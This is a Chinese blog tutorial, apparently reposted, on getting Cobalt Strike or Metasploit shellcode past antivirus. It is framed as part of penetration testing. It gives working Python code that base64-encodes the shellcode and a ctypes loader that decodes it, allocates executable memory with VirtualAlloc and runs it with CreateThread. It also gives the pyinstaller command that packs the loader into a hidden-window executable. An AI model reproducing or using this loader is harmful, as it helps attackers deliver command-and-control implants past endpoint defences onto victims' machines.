前言
在进行渗透测试过程中,往往会遇到主机有杀软,导致我们的木马被查杀,那么我们就得想办法绕过杀软进行上线Cobalt strike 或者 Metasploiit何为shellcode?
“shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名”何为shellcode混淆?
其实就是把我们的shellcode进行加密:如base64,AES等等实现过程
4、shellcode加载器把我们加密过后的shellcode解密
利用cobalt strike生成shellcode
简单处理payload.py shellcode文件
对我们提取出来的shellcode进行加密
# coding=utf-8
import base64
# 读取shellcode文件
shellcode = open('payload.py')
shellcode = shellcode.read()
# 取出shellcode内容
s1 = shellcode.find("\"")+1
s2 = shellcode.rfind("\"")
shellcode = shellcode[s1:s2]
# print(shellcode)
# 把shellcode base64加密并写入base64.txt文件
base64_shellcode = base64.b64encode(shellcode.encode('UTF-8'))
with open('base64.txt', 'wb') as shell:
shell.write(base64_shellcode)
编写加载器
import base64
import codecs
import ctypes
shellcode = ""
shellcode = base64.b64decode(shellcode)
shellcode = codecs.escape_decode(shellcode)[0]
shellcode = bytearray(shellcode)
# 设置VirtualAlloc返回类型为ctypes.c_uint64
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
# 申请内存
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
# 放入shellcode
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
ctypes.c_uint64(ptr),
buf,
ctypes.c_int(len(shellcode))
)
# 创建一个线程从shellcode放置位置首地址开始执行
handle = ctypes.windll.kernel32.CreateThread(
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_uint64(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0))
)
# 等待上面创建的线程运行完
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
把我们加密过后的shellcode放进shellcode = ""里利用pyinstaller打包成exe
pyinstaller -F bypassav.py -w
测试免杀率
结尾
后续有时间会给大家写一篇分离shellcode,上述过程皆可进行自动化生成,我已经实现到自己的平台了
文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650502553&idx=2&sn=5d8fd2c16d9f6abd0adf0e9947012abe&chksm=83ba107db4cd996b05675f9bc84a7edacbb4a15316402c90429fbb946bb24d1fc495f76efd59#rd
如有侵权请联系:admin#unsafe.sh